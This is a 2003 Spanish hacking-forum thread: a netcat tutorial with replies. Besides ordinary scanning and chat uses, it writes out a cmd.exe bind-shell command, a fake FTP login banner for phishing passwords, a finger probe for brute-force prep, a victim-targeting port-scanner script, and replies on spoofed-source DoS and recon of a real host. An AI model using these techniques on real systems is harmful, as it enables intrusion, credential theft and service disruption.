Foro de elhacker.net

Informática => Tutoriales - Documentación => Mensaje iniciado por: Rojodos en 21 Julio 2003, 23:24 pm



Título: El Netcat. La navaja suiza de los hackers y administradores ;)
Publicado por: Rojodos en 21 Julio 2003, 23:24 pm
==========================================
Netcat.
Sacandole Provecho a una exelente Utilidad.
por: Kliber.
kliber@hven.com.ve
Hackers Venezuela
==========================================

   Netcat es un pequeño programa creado para uso de los
administradores de redes (y por supuesto para los Hackers) :), este
proggie fue creado originalmente por Hobbit y porteado a Win95 y NT por
Weld Pond de L0pht , tiene mas de un año desde que fue Liberado y muy
poco se ha escrito sobre este Programita; Principalmente porque la estructura
de sus comandos es poco familiar para el usuario medio. Netcat tiene
infinidad de funciones, aunque se deja que sea el usuario quien las
averigue :P, y en el archivo de ayuda ponen algunos ejemplitos muy
elementales solamente...

         La especialidad de NetCat es el Protocolo tcp/ip, y le dá a la
máquina de windows, cierto poder sobre este protocolo que solo tenía
UNIX,  trabaja con lineas de comandos desde MS-DOS (o desde el
Shell de Linux), y según parece, puede hacer casi cualquier cosa sobre
TCP/IP. El comando principal es nc con su respectiva variable u opción
al mas puro estilio Unix.


         Cabe destacar que la información sobre Netcat y sus usos
especificos es bastante limitada; aunque Hobbit en su documento aclara
muchas cosas, cita algunos ejemplos y dice que NetCat puede ser utilizado
para mas de 1001 vainas...

   Netcat puede   ser encontrado en: http://www.l0pht.com/~weld/netcat


   Netcat en WinX
   ==============
   
Este es el resultado de el comando de ayuda de netcat en una máquina windows

 c:>nc -h

connect to somewhere:   nc [-options] hostname port [ports]
listen for inbound:     nc -l -p port [options] [hostname] [port]
options:
        -d              detach from console, stealth mode

        -e prog         inbound program to exec [dangerous!!]
        -g gateway      source-routing hop point, up to 8
        -G num          source-routing pointer: 4, 8, 12, ...
        -h              this cruft
        -i secs         delay interval for lines sent, ports scanned
        -l              listen mode, for inbound connects
        -L              listen harder, re-listen on socket close
        -n              numeric-only IP addresses, no DNS
        -o file         hex dump of traffic
        -p port         local port number
        -r              randomize local and remote ports
        -s addr         local source address
        -t              answer TELNET negotiation
        -u              UDP mode
        -v              verbose [use twice to be more verbose]
        -w secs         timeout for connects and final net reads
        -z              zero-I/O mode [used for scanning]
port numbers can be individual or ranges: m-n [inclusive]

  Bien; un analisis rápido de estas variables nos da una idea del
potencial de este pequeño programa y las infinitas posibilidades que nos
ofrece el poder manejar conexiones de una manera tan básica y sencilla:

<------ Opciones de Netcat --------->

-d  (Modo Stealth o encubierto)
   Esta opción desvincula al Programa de la consola, haciendolo
trabajar en el BackGround.

-e<prog>  (Ejecuta un programa cuando se conecta)
   Puede ser utilizado para ejecutar incluso un Shell tanto
en WinX como en *NIX.

-l  (Escuchando conexiones)
   Deja a un puerto abierto en espera de una conexión

-L  (lo mismo que anteriormente pero sigue escuchando aún cuando la
conexión es cerrada)
    Esta opción es incluida en la versión de Weld Pond de L0pth, y
es muy util para seguir escuchando en el puerto, a diferencia de -l
(que la conexión cerrada termina con el proceso de nc) esta opción -L
permite seguir escuchando en el mismo puerto (la rutina de nc -l es
reiniciada).

-n   (Dirección numerica especifica; no hace un DNS Lookup) Netcat tiene la
facultad de resolver nombres de dominio mediante un DNS Lookup, con esta
opción le especificamos que no lo haga, y use solamente direcciones IP.

-o<logfile>  (obtiene un archivo log en Hex de la acción) Genera un Log de
las actividades de netcat en código Hexadecimal.

-p<puerto> (Puerto para pegarse) Algunas veces debes especificarle con esta
opción el puerto a realizar una acción.

-s<ip addr>  (pegarse a un IP especifico) Netcat puede utilizar IP de una red
como fuente local.

-t   (Funciona como un pequeño demonio telnet) Con esta opción le especificas
a netcat que debe realizar negociaciones telnet.

-u  specify UDP (Utilizar Protocolo UDP) Con esta opción le dices a netcat que
trabaje con protocolo UDP en vez de TCP.

-v   (modo verbose, mas información, se le puede añadir otra -v para mas
info todavia) Bastante util y necesario, sobre todo para estudiar demonios
en profundidad y observar todos los detalles en un Sniffing.

-w <segundos> (Especifica un tiempo para terminar) Con esta opción le especificas un
tiempo determinado para realizar conexiones .

-r (Genera un Patron Ramdom de puertos locales o remotos) Muy util para evitar
patrones lógicos de Scanning.

-g <gateway> (especificar Gateways) Una de las opciones más interesantes de netcat,
permite utilizar Routers como "puentes" de conexión.

-G <numero> (Especificar puntos de Routing), Con esta opción podemos crear
una cadenaaleatoria de hosts para crear un ruta perdida para tus paquetes
(Spoofing).
 
-i <segundos> Especifica un intervalo de segundos entre puertos Scaneados.

<------------- Fin de las opciones comentadas ------>


   Netcat en Linux
   ===============

   Netcat en una plataforma como Linux se convierte en una utilidad
muy potente, pudiendo ser utilizado en conjunto con lenguajes de programación
como Perl y C , o bien desde la propia Linea de comandos del poderoso Shell
de Linux mediante Shell Scripts.

   Cabe destacar que distribuciones como RedHat Linux trae junto con
sus paquetes de instalación una versión limitada de netcat; lo mas recomendable
es bajar de la red la versión full de netcat para Linux (Importante: La
versión de netcat para linux viene a prueba de lamers, por lo cual debemos
compilar a netcat con unos flags especiales para poder obtener las opciones
-t y -e (Telnet y Gaping Security Hole) ). Bajas el .tar de netcat y lo
desempaquetas en el directorio de tu preferencia, te ubicas dentro del
directorio de netcat y lo compilas con Make utilizando las siguientes Flags:

[root@DarkStar] #make linux DFLAGS=" -DTELNET -DGAPING_SECURITY_HOLE"


 Copias el binario (nc) al directorio /usr/bin , de esta manera podras usar
netcat directamente llamandolo de cualquier parte del Shell, ademas de que
podrás usar los scripts que hagas (o consigas en la red) sin problemas; netcat
trae unos scripts muy interesantes y bien comentados para que los estudies
y comprendas mejor su implementación en scripts, los scripts están en el
directorio donde desempaquetastes netcat en /scripts , los corres como
siempre: ./probe  (o el script que quieras).


   Utilizando Netcat.
   ==================

   Para ilustrar mejor como trabajamos con este programa, lo mejor es
observar ejemplos prácticos y analizar su estructura para poder comprender
mejor como funciona y así poder crear nuestras propias aplicaciones.

 Algunas de las cosas que podemos hacer con NetCat son:

         Obtener un Shell rapidamente en una máquina remota usando la
opción -l (Listen) conjuntamente con la opción -e (ejecutar) , cuando el
proggie corre con estas variables y la conexión es realizada, NetCat
ejecuta el programa elegido y se conecta a stdin y stdout del programa
en la conexión a la red.

nc -l -p 23 xxx.xxx.xxx.xx 23 -t -e cmd.exe

         Este comando dejará a NetCat escuchando el Puerto 23 (telnet) ,
cuando es conectado a travéz del cliente, ejecutará un Shell (cmd.exe)
la opción -t le dice a NetCat que maneje cualquier negociación que el
cliente pueda esperar....

         Si esta conexión es realizada desde una máquina NT, el shell
correrá los permisos del proceso que han generado a NetCat (Hmmm...) así
que hay que ser muy cuidadosos :)

         La belleza de NetCat es que puede hacer lo mismo en CUALQUIER
puerto :) Puedes dejar a NetCat escuchando en los puertos NETBIOS, que
están probablemente corriendo en la mayoría de las máquinas NT, de esta
manera puedes lograr una conexión a una máquina que esté utilizando
"Filtrado de Puertos" activado en TCP/IP security Network Control Panel,
NT no parece tener ninguna seguridad alrededor de cuales puertos  los
programas de usuarios son permitidos amarrar, esto quiere decir en pocas
palabras, ejecutar comandos y programas que puedan unirse a los Puertos
NETBIOS.


         Como anteriormente se mencionó, puedes utilizar a Netcat para
estudiar diferentes puertos, con la siguiente sintaxis:

c:\>nc -v <IP> <puerto> (puedes añadir otra -v)


         Uno de los puertos mas interesantes a la Hora de Analizar un
Host, es el puerto 79 (Finger) , puedes obtener nombres de usuarios e
información muy util a la hora de planear un "Brute-Force Attack", este
comandito de Netcat te muestra la Flexibilidad del Proggie en cuestion,
dandote una idea de sus posibilidades:

c:\>nc -v <host> 79 < user.txt > log.txt

         El comando anterior le dice a netcat que se conecte en modo
verbose al Host predeterminado en el puerto 79 (Finger) y envie el
contenido del archivo user.txt (OJO: no he probado esto con una posible
lista de nombre de usuarios al azahar), la respuesta del servicio será
guardada en el archivo log.txt


   Scanner:
   ========

         Netcat puede ser utilizado como scanner, sus multiples opciones
le permiten realizar un gran número de combinaciones, pudiendo realizar
Scannings en Puertos Random, en puertos conocidos, en modo ascendente o
descendente, con intervalos de tiempo, utilizando gateways para evitar
mostrar la IP fuente del Scanning, etc.

 C:\nc11nt>nc -v -v -z 127.0.0.1 53 25 21

DNS fwd/rev mismatch: localhost != darkstar
localhost [127.0.0.1] 53 (domain): connection refused
localhost [127.0.0.1] 25 (smtp): connection refused
localhost [127.0.0.1] 21 (ftp): connection refused
sent 0, rcvd 0: NOTSOCK

         Pues si; aqui tienen un pequeño y primitivo scanner, se le
pueden añadir puertos escogidos como en el ejemplo anterior o asignarle
un rango de puertos:

C:\nc11nt>nc -v -v -z 127.0.0.1 1-53

DNS fwd/rev mismatch: localhost != darkstar
localhost [127.0.0.1] 53 (domain): connection refused
localhost [127.0.0.1] 52 (?): connection refused
localhost [127.0.0.1] 51 (?): connection refused
localhost [127.0.0.1] 50 (?): connection refused
localhost [127.0.0.1] 49 (?): connection refused
localhost [127.0.0.1] 48 (?): connection refused  etc...

         Volvemos con la opción -v (verbose) y la Opción -z (zero i/o)
que es usada para scanning, los puertos se lo especificamos al final del
IP del host, bien sea individuales separados por un espacio; o por un
rango de puertos.
      

   Sniffer:
   ========

   Otra de las interesante posibilidades de netcat es su capacidad para
escuchar conexiones en cualquier puerto, pudiendo redireccionar todo el
tráfico del mismo hacia un archivo o hacia pantalla, en este sencillo
ejemplo, podemos observar las bases de un sencillo sniffer en Windows:

C:\nc11nt>nc -v -v -L 127.0.0.1 -p 23

DNS fwd/rev mismatch: localhost != darkstar
listening on [any] 23 ...
DNS fwd/rev mismatch: localhost != darkstar
connect to [127.0.0.1] from localhost [127.0.0.1] 1131
login: sniffado
password: jeje!!
puedo ver todo lo que escriben aqui... Muuuaaahahahahahah!!! B-]


   Tambien podemos redireccionar toda la salida a un archivo e
irnos a realizar otras actividades ,ientras netcat hace su trabajo:

C:\nc11nt>nc -v -v -L -p 23 127.0.0.1 -t >login.txt
DNS fwd/rev mismatch: localhost != darkstar
listening on [any] 23 ...

[Aqui viene la conneción...]

DNS fwd/rev mismatch: localhost != darkstar
connect to [127.0.0.1] from localhost [127.0.0.1] 1030

[Todo lo que escriba la connección se va al archivo login.txt]
 sent 0, rcvd 42

[La opción -L permite que netcat escuche nuevamente al terminar la conexión,
"New Victims Wanted" Hehe!]

DNS fwd/rev mismatch: localhost != darkstar
listening on [127.0.0.1] 23 ...




         El Exploit-Explained: nc -v -v -L 127.0.0.1 -p 23
    ---------------------

         Ejecutamos a Netcat con la opción o variable -v (verbose)
(doblemente "verbose" por si acaso) ;) esto hará que el resultado de
netcat, sea mostrado directamente en pantalla (a diferencia del archivo
usado por Dr._X) , la opción o variable -L (Listen, and listen again)
nos permitirá dejar escuchando u "oliendo" en determinado puerto aun
cuando la conexión sea interrumpida (listen again), con la variable -p
le indicamos el puerto...

         Al ejecutar a netcat con esa combinación de variables las
opción -v me indica en pantalla el Host y el puerto de escucha:

DNS fwd/rev mismatch: localhost != darkstar
listening on [any] 23 ...


         Realizo desde otra ventana un telnet a localhost (127.0.0.1) en
el puerto 23, netcat me informa sobre lo que ocurre en el puerto 23:

DNS fwd/rev mismatch: localhost != darkstar
connect to [127.0.0.1] from localhost [127.0.0.1] 1131
login: sniffado


         Voilá! un Sniffer en LocalHost!  Jajaja!!!

      

   Detector de Conneciones Sospechosas:
   ====================================

   La posibilidad de dejar a netcat escuchando en determinados puertos,
nos permite crear una especie de "trampa" para un supuesto agresor que utilize
scanners, o herramientas tales como NetBus o BackOrifice en contra de
nuestras estaciones. Incluso, podemos crear un archivo que haga un Flood
y redireccionar su salida hacia la estación agresora en caso de una conexión
no autorizada a determinado puerto. (jeje! y se me ocurren un monton de cosas
 más, Muaahahaha!)  :)

Este es un ejemplo de un detector de BO, Je! y funciona! este es un ejemplo
real de un dia como cualquier otro en IRC; he aquí el ejemplo:

C:\nc11nt>nc -u -v -v -L -p 31337 127.0.0.1 31337
DNS fwd/rev mismatch: localhost != darkstar
listening on [any] 31337 ...

invalid connection to [0.0.0.0] from nas1-064.ras.bqm.cantv.net
[161.196.246.65]
 31338

         Back Orifice utiliza el protocolo UDP para realizar sus
travesuras, realiza la conexión desde un puerto aleatorio (casi siempre
el 1080) aunque en este caso lo hizo desde el 31338 (posiblemente una
variante de BO), por eso se utiliza la opción -u (protocolo udp) ,
netcat se queda esperando conexiones UDP en el puerto 31337 (default de
BO) , cuando alguien hace un sweep a tu IP netcat lo detecta enviando a
pantalla el IP y el DNS del agresor...

         Luego un pequeño "Ping of Death" (Nuke) para el transgresor y
le hacen un Scan para ver cuando desaparece B-]

nas1-064.ras.bqm.cantv.net [161.196.246.65] 48 (?): connection refused
nas1-064.ras.bqm.cantv.net [161.196.246.65] 47 (?): connection refused
nas1-064.ras.bqm.cantv.net [161.196.246.65] 46 (?): connection refused
nas1-064.ras.bqm.cantv.net [161.196.246.65] 45 (?): TIMEDOUT
nas1-064.ras.bqm.cantv.net [161.196.246.65] 44 (?): TIMEDOUT<--Chao!!! Jeje!!


   Otros usos Miscelaneos:
   =======================

    Puedes utilizar algo de ingienería social para capturar algunos
passwords con netcat, por ejemplo, si una máquina no tiene abierto el
puerto de FTP o de telnet, creas un archivo de texto que solicite el ID
y el Password de la víctima; algo así:

Microsoft Internet FTP Server V.5.9 [Beta]
04/16/99 myhost.com
Please introduce Username, password and press "Enter"
LogOn:

Luego redireccionas el archivo hacia la victima:

C:\nc11nt>nc -v -v -L -p 21 nombre del host -t < login.txt

         Si el tonto cae... Ahí va tu password, Jeje!! B-] un poco de
imaginación y maña te permitirán encontrar muchas utilidades para
netcat.


   Netcat en Vez de Telnet.
   =======================

   Yo personalmente prefiero usar netcat para realizar connecciones
remotas como alternativa al Telnet. la ventaja de realizar conexiones telnet
desde netcat es que este esconde "algo" sobre tu conexión, lo que lo hace
mas "sigiloso" que telnet, (de ahí por que lo llamaron netcat), Realizando
una conexión "Limpia" en determinado puerto, obviando las negociaciones
comunes de Telnet que pueden confundir al cliente en determinados casos,
como por ejemplo, al utilizar ciertas Backdoors muy conocidas en Unix.

    OJO: algunas máquinas interpretan al cliente de telnet
y asumen el nombre del usuario que lo utiliza, de allí el porqué algunos
servidores solo preguntan por password ; teoricamente netcat no envia
esta información. Por eso, es recomendable acostumbrarse a utilizar netcat
para hacer conexiones remotas:

 
   c:> nc -v nombre del host 23(o el puerto de tu preferencia)


   Netcat y Programación:
   ======================

   Esta combinación desencadena todo el Poder de Netcat en su máxima
expresión; Tratandose de una herramienta que funciona con lineas de comandos,
su integración con un lenguaje de programación le permite realizar gran
cantidad de tareas, y posibilidades se van descubriendo dia a dia con su
inclusión en nuevos Scripts y Exploits.

   Muchos ScriptKiddies que no tienen idea de lo que hacen, se sienten
frustrados porque muchos de los Scripts y Exploits que bajan de la Red
simplemente no les funciona, porque no saben interpretar el Código y por
lo tanto son incapaces de efectuar las modificaciones necesarias para incluir
librerias, paths o utilidades necesarias para su funcionamiento.
(Jódanse ScriptKiddies!!! Jajaja!!)

   Netcat es exelente para implementar exploits remotos, permitiendo
enviar el código a cualquier puerto vulnerable con una simple orden, logrando
ejecutar todos los comandos necesarios para explotar determinados servicios.

   Varios exploits que circulan actualmente en la Red, usan a netcat
como "motor" para manejar las conexiones, si analizamos el código de estos
programas podemos observar un nc por ahí, esto significa que el Proggie en
cuestión necesita una versión correctamente compilada de netcat en el
directorio  /usr/bin . A continuación un pequeño programa realizado por
el Doctor_X de Hven utilizando a netcat:

<---------- Hven Port Scanner!! ------>

# !/bin/bash
# Scanner de Puertos
# By DoctorX 17/04/99  email: d0ct0r_x@bactery.8m.com
# Zona de Bacterias  http://bactery.8m.com
# Hackers de Venezuela http://www.hackhour.com.br/hven
# Este es un shell script hecho por mi para la verificacion de
# conexiones a un host utilizando netcat.

# Declaracion de Variables

export NETCAT=" nc -v -v -w 8 -z "
export RANGO=$2
LOCALHOST=$(uname -n)
export PUERTOS="21 23 25 79 80 110 111 113 139 143 513 514 515 6000 31337"
export MEM1="Scanner de Puertos "
export MEM2="by "  
export MEM22="para Hackers Venezuela"
export MEM3="Victima : "
export MEM4="Falta el GateWay para el Source Routing !!!!!!"
export MEM5="Te van a pillar !!!!!!! $USER jejejejeje "
export MEM6="Local Host : $LOCALHOST "
export MEM7="UDP Scan "
export MEM8="http://www.hackhour.com.br/hven"
export re=""
export cl=""
export rojo=""
export email="email:d0ct0r_x@bactery.8m.com"

# Declaracion de Funciones

# Mensaje cuando no se le dan Parametros

function mem() {
local uso="uso  :$0  [opcion]  <host> <gateway>"
local DRX="DoctorX"
echo $MEM1
echo $MEM2   ${rojo}$DRX${cl}  $MEM22
echo $MEM8
echo ${rojo}$uso${cl}
echo "<host>             :IP/HOSTNAME de La Victima jejejeje "
echo "<gateway>          :source-routing , es opcional "
echo "opciones : "
echo "u                  :esta opcion de utiliza para hacer scan udp"
echo "so                 :Determinacion de SO de servidores Web"
echo "r rango_de_puertos :Cambia el rango de puertos por defecto :plow-phi" &&
exit ; }

# Mensaje Inicial

function mem2() {
VICTIMA=$1
echo $MEM1
echo $MEM2 ${rojo}DoctorX${cl} $MEM22
echo $MEM3  $VICTIMA
echo $MEM6 ; }

# Mensaje 2

function mem_web() {
mem_web1="Hackers Venezuela"
mem_web2="By"
mem_web3="Victima : "
VICTIMA=$1
mem_web4="Determinacion de SO en Web Servers"
echo $mem_web1
echo $mem_web4
echo $mem_web2 ${rojo}DoctorX${cl} $email
echo $mem_web3 $VICTIMA ;}


# Scan Tcp

function tcp() {
 HOST=$1
 $NETCAT  $HOST $PUERTOS ; }

# Scan Tcp con Rango

function tcp_rango() {
 HOST=$2
 RANGO=$1
 $NETCAT  $HOST $RANGO ; }

# Scan UDP

function udp() {  
VICTIMA=$1
echo $MEM7
$NETCAT  -u $VICTIMA $PUERTOS ; }

# Scan UDP con gateway

function udp_gateway() {
echo $MEM7
VICTIMA=$2
GATE=$1
NETCAT_GATE="nc -v -v -z -u $VICTIMA -g $GATE "
$NETCAT_GATE $PUERTOS ; }

# Scan con Source Routing
 
function tcp_gateway() {
GATE=$1
HOST=$2
RANGO=$PUERTOS
echo "Gate : $GATE "  
$NETCAT -g $GATE  $HOST $RANGO ; }

# Advertencia

function  adv() {
local MEM4="Falta el GateWay para el Source Routing !!!!!!"
local MEM5="Te van a pillar !!!!!!! $USER jejejejeje "
echo ${rojo}$MEM4${cl}
echo ${re}${rojo}$MEM5${cl}  ; }

# Determinacion de SO

function web_so() {
NC="nc -w "
HTTPPORT="80"
GET="GET /"
ECHO="/bin/echo"
HEAD="HEAD / HTPP/1.0"
HTTPVARIABLE="Server:"
WEB_SERVER="$1"
LOG="salida.txt"
#CHECKHTTP=( echo $GET  ; sleep 5)| $NETCAT $VICTIMA  80
( echo $HEAD  ; echo ; echo ) | $NC  8 $WEB_SERVER $HTTPPORT | grep $HTTPVARIABLE  | cut -d: -f2  1> $LOG  
cat  $LOG
rm -f $LOG  ;}


# Seleccion de Opcion

case $# in 0 ) mem ;;
           1 ) mem2 $1 ;
               adv  ;
               tcp $1 ;;
           3 ) if [ "$1" != "r" ]; then
                  mem2 $2
                  udp_gateway $3 $2
               else {  mem2 $3
                     adv  
                     tcp_rango $2 $3 ;}
               fi ;;
           2 ) if [ "$1" != "u" ] ; then
                       if [ "$1" != "so" ] ; then
                             {  mem2 $1
                             # adv  
                             tcp_gateway $2 $1 ;}
                       else { mem_web $2
                              web_so $2 ;}
                       fi
                else  { export HOST=$2
                       mem2 $HOST
                       udp $2  
                       exit 0 ;}
                fi ;          
esac

 
<------- Fin del Hven-Scanner, cortar aquí --------->

         Conclusión:
        ============
   
   Si estudiamos detalladamente las variables, el misterio de
netcat desaparece, viene la parte de la imaginación; ¿Que otras
funciones le podemos asignar? ¿Que mas podría hacer? ; al revisar el
programa que envió Dr._X me dije: "Lógico! Hmmm... Y que tal si hacemos
asi..." ; el hacking no es más que probar nuevas posibilidades, utilizando
el ingenio, los conocimientos acumulados y una dosis bastante fuerte de
imaginación podremos lograr loque queramos.  :)


   Si tienes otras ideas, utilidades, programas o forma innovadora
para utilizar netcat, escribenos un mail, estaré encantado de anexarlo
en este documento....


   Este Documento fue Realizado por Kliber, Agradecimientos especiales
a Doctor_X (Code Freak) :), DarkDeath, y a todos los miembros de nuestra
comunidad por su invaluable Colaboración.

   "Hecho en Venezuela!"

==============================
   kliber@hven.com.ve
   Hackers Venezuela
   "El Conicimiento es Poder!!"
   http://hven.com.ve
==============================    


Título: Re:El Netcat. La navaja suiza de los hackers y administradores ;)
Publicado por: Azazel en 21 Julio 2003, 23:35 pm
Rojodos, me han comentado personas que saben de estas cosas que el Netcat en realidad no es tan bueno, que sirve para todo pero todo lo hace a media, y que para cada función que tiene hay herramientas especificas que lo hacen mucho mejor.

Me gustaría conocer tu opinión y la de los demás.

Saludos.


Título: Re:El Netcat. La navaja suiza de los hackers y administradores ;)
Publicado por: Rojodos en 21 Julio 2003, 23:41 pm
La posibilidad de jugar con las shells en Netcat (tanto por el spawn de la misma, shell sperandote en tal puerto, spearando conexiones en tal otro puerto, reverse shell, etc..) son muy buenas, y no creo que haya un programa o aplicacion con tales funciones.

Muchos exploits se ayudan del Netcat (de una forma u otra) para que funcionen....

Yo creo que es una herramienta imprescindible, y que es multiproposito (puedes iniciar una sesion telnet con netcat, por ejemplo).

Es cierto que como scanner, el Nmap lo supera o en auditorias el NESSUS.

Pero si conocieras todas las posibilidades que te brinda el netcat, sabrias que no solo es imprescindible, sino que es unica. ;) Netcat, te amo xDD



Título: Re:El Netcat. La navaja suiza de los hackers y administradores ;)
Publicado por: EMPICAL en 22 Julio 2003, 01:27 am
Netcat da mucho juego, incluso te puedes montar un chat privado entre dos users.


Título: Re:El Netcat. La navaja suiza de los hackers y administradores ;)
Publicado por: cokeing en 23 Julio 2003, 05:12 am
lo del chat privado no se hace haciendo???:
Código:
write user consola_tty



Título: Re:El Netcat. La navaja suiza de los hackers y administradores ;)
Publicado por: EMPICAL en 23 Julio 2003, 07:02 am
No que yo sepa.

Es muy sencillo, pones el netcat a la escucha en un puerto y el otro user se conecta con el netcat por ese mismo puerto.

Lo probe con Dargo un día y funciona.


Título: Re:El Netcat. La navaja suiza de los hackers y administradores ;)
Publicado por: neo_hacker en 23 Julio 2003, 09:36 am

  
-g <gateway> (especificar Gateways) Una de las opciones más interesantes de netcat,
permite utilizar Routers como "puentes" de conexión.

-G <numero> (Especificar puntos de Routing), Con esta opción podemos crear
una cadenaaleatoria de hosts para crear un ruta perdida para tus paquetes
(Spoofing).
 

Esto no te entendi muy bien  ???


Título: Re:El Netcat. La navaja suiza de los hackers y administradores ;)
Publicado por: EMPICAL en 23 Julio 2003, 09:42 am
Quiere decir que puedes usar un router como puente. Mas o menos como si se tratara de un proxy.

De esto mismo estubimos hablando en el foro de rojodos pero ahora no recuerdo la sintaxis.


Título: Re:El Netcat. La navaja suiza de los hackers y administradores ;)
Publicado por: neo_hacker en 23 Julio 2003, 09:48 am


  
-g <gateway> (especificar Gateways) Una de las opciones más interesantes de netcat,
permite utilizar Routers como "puentes" de conexión.

-G <numero> (Especificar puntos de Routing), Con esta opción podemos crear
una cadenaaleatoria de hosts para crear un ruta perdida para tus paquetes
(Spoofing).
 

Osea se puede poner una IP( o makina) kualkiera y hacerle router

 ??? ???


Título: Re:El Netcat. La navaja suiza de los hackers y administradores ;)
Publicado por: EMPICAL en 23 Julio 2003, 10:10 am
Una cualquiera que este activa, ya que los paquetes tienen que pasar a traves de el.

Se estubo hablando de usar esa opcion para hacer un DoS metiendo un gateway falso pero a mi no me funciono.


Título: Re:El Netcat. La navaja suiza de los hackers y administradores ;)
Publicado por: okahei en 23 Julio 2003, 10:26 am
vale con esta opcion mandariamos paquetes falseados, pero nunca recibiriamos respuesta, puesto que las respuestas se mandarian al pc usado como gateway.

lo unico que veo seria para hacer un DOS, pero aki llega otra pregunta, a partir del nt en adelante ya no es vulnerable a ataques DOS, del tipo cambiar la ip origen? que es lo que se intenta usando la opcion gateway.

por cierto con iptables cambiar la direccion origen es trivial, pero yo provando con amigos, no les he conseguido tirar.

un saludo.


Título: Re:El Netcat. La navaja suiza de los hackers y administradores ;)
Publicado por: EMPICAL en 23 Julio 2003, 13:02 pm
Eliminando la respuesta icpm te evitas muchos dolores de cabeza, además de ser una regla muy fácil.


Título: Re:El Netcat. La navaja suiza de los hackers y administradores ;)
Publicado por: okahei en 24 Julio 2003, 06:33 am
no si la tengo capada, pero cuando hago las pruebas con amigos, que no lo tienen capado, no les consigo tirar.

ademas se supone que se podria hacer un DOS, tirando paquetes con el bit SYN activo y con la ip origen falseada,
pero nada, por ejemplo, empiezo a lanzar paquetes al puerto 1214 del kazza pero no lo tiro, ni siquiera poniendo como ip origen la suya propia.

un saludo.


Título: Re:El Netcat. La navaja suiza de los hackers y administradores ;)
Publicado por: EMPICAL en 24 Julio 2003, 07:11 am
¿Como haces para mandar esos paquetes?

¿Utilizas flags como los que usa nmap?


Título: Re:El Netcat. La navaja suiza de los hackers y administradores ;)
Publicado por: okahei en 24 Julio 2003, 10:39 am
es muy facil veras, con postrouting del iptables+netcat

lo aprendí hace bien poco, es la leche ver con el ethereal como van saliendo los paquetes con la ip origen la que tu le quieras poner, como si le pones una ip privada, o la suya misma.

 
iptables -t nat -A POSTROUTING -j SNAT --to 192.168.0.1

(gracias moebius)

un saludo.
 


Título: Re:El Netcat. La navaja suiza de los hackers y administradores ;)
Publicado por: eL_mEsIAs en 20 Octubre 2003, 13:33 pm
ok korrijanme si me ekivoko .. kon esta esplicaion que dan kiere decir que puedo hacerme pasar por una ip que esta dentroe del ramgo de ip del server  .... ejemplo

consigo info del server ...

xxx.xxx.xxx.x18

Resolving host www.something.com.mx
Resolved as : xxx.xxx.xxx.xxx
NETBIOS discovery ...
Done sending, waiting for responses ...
SNMP discovery ...
Community string : public
Done sending, waiting for responses ...
ICMP sweep ... (PING!)
Done sending, waiting for responses ...
PONG from xxx.xxx.xxx.xxx
- Time to live (TTL) = 124 (128)
  + 4 hop(s) away
- ICMP code in response = 0 => Windows box
- Timestamp Reply (200.33.136.18)
- ICMP UNREACH for closed port (xxx.xxx.xxx.xxx)
Ready
1 Computer(s) found.

[xxx.xxx.xxx.xxx]
Resolving xxx.xxx.xxx...

Resolved as : customer-xxx.xxx.xxx.xxx.uninet.net.mx
UDP scanning thread started ...
TCP scanning started ...
12 open port(s).
Gathering banners ...
80 - Trying to determine web server type
Server : Microsoft-IIS/5.0
Operating System : Windows 2000
Anonymous logins accepted ?
No
8080 - Trying to determine if we have a web server here

UDP scanning thread stopped.
SMB probing ...
Connecting ...(1/6)
Name "CUSTOMER-xxx-xxx-xxx-xxx" encoded as "EDFFFDFEEPENEFFCCNDCDADACNDDDDCN"
Session refused : File sharing and printing is not activated!?
NULL session refused.

Alerts probing ..
Checking FTP Alerts ...
Checking DNS Alerts ...
Checking Mail Alerts ...
Check for EXPN/VRFY commands ...
250 Root User<root@something.somethingmore>

250 Root User<root@>

Checking Service Alerts ...
Checking RPC Alerts ...
Checking Miscellaneous ...
Checking Information ...
CGI probing ...
Please wait ...
- Frontpage check (2)
/_vti_bin/shtml.exe
Too manny timeouts. Aborting ...
CGI probing finished.

pruebo rango de ip´s

? xxx.xxx.xxx.xx2 : custumer xxx-xxx-xx2. uninet.net.mx
? xxx.xxx.xxx.x18 : Custumer xxx-xxx-x18.uninet.net.mx
ese 18 es la ip scaneada arriba ..
luego algo interesante ... SISCO 2509
SISCO xxx.xxx.xxx.x19 : host-victima.something.net.mx
3com xxx.xxx.xxx.x86 : LanMismaEmpresa
SISCO xxx.xxx.xxx.127 : Host-victima.something.net.mx

escaneo sisco x19 y tengo hasla los loguins.... pero no pertenerco a el rango de ips del server :( ... pero segun entiendo .. corrijanme porke soy newbie ... komodice okahei .. puedo tener

xxx.xxx.xxx.x18 y pasar para xxx.xxx.xxx.x19 ??¿¿¿







Título: Re: El Netcat. La navaja suiza de los hackers y administradores ;)
Publicado por: Locuras en 22 Septiembre 2004, 11:15 am
weno

yo entendí la teoría, ahora bien, la practica no se, algo hago mal

aqui os dejo un texto d alguien , q se mete en la maquina y ejecuta cmd.exe con el netcat, yo lo he intentado hacer como pone aqui pero la llamada con "http://" al fichero no me funciona, alomejor es el modo de llamarlp. es q el netcat ¿lo tienes q ejecutar en la maquina del cliente y luego meterle los parametros para luego llamarle tu desde la tuya ? ¿es asi? ¿como se haria?

respecto a como se hace segun pone aqui, ¿se puede hacer todo desde tu maquina? es decir, ¿se puede poner en escucha el puerto de la victima desde tu equipo? si es asi ¿como se hace?

aqui os dejo lo q encontre x ahi

Introduccion
=-=-=-=-=-=-

Hace ya años que microsoft nos sorprendio a todos con su Windows NT en
un intento con hacerse con parte del mercado que hasta entonces
estaba dominado por los sistemas UNIX, y aunque las primeras versiones
no dieron mucho que hablar, todo cambio con la llegada de la version
4.0 en la que un renovado interfaz estilo windows 9x y algunas mejoras
hicieron que muchas empresas instalaran sus servidores bajo NT. Desde
su aparicion hasta ahora NT se ha ido consolidando poco a poco dentro
de las empresas, siendo lo mas normal ver como todas las empresas de
hoy en dia tienen sus servidores bajo NT y kiza algun UNIX, pero muy
raro de ver empresas que se centren solamente UNIX. Siendo lo normal
una convivencia entre los dos sistemas.

Despues de estos años Microsoft vuelve a la carga con Windows 2000 un
producto con el que pretende seguir creciendo y ampliando su mercado
hacia todas las empresas con sus tres versiones ( Profesional, Server,
Advanced Server ). Mucho se ha hablado sobre la estabilidad y la poca
seguridad de los sistemas que utilizan Windows NT/2000 y la seguridad
que proporciona UNIX frente a Windows. La verdad es un tema que daria
mucho de que hablar y que en mi opinion ninguno de los dos es claro
vencedor, cada sistema tiene sus cosas y es mejor que el otro en
determinadas tareas.

El caso es que este articulo no va a ser una critica ni una opinion
personal sobre Windows / Unix, asi que centremonos en el asunto que
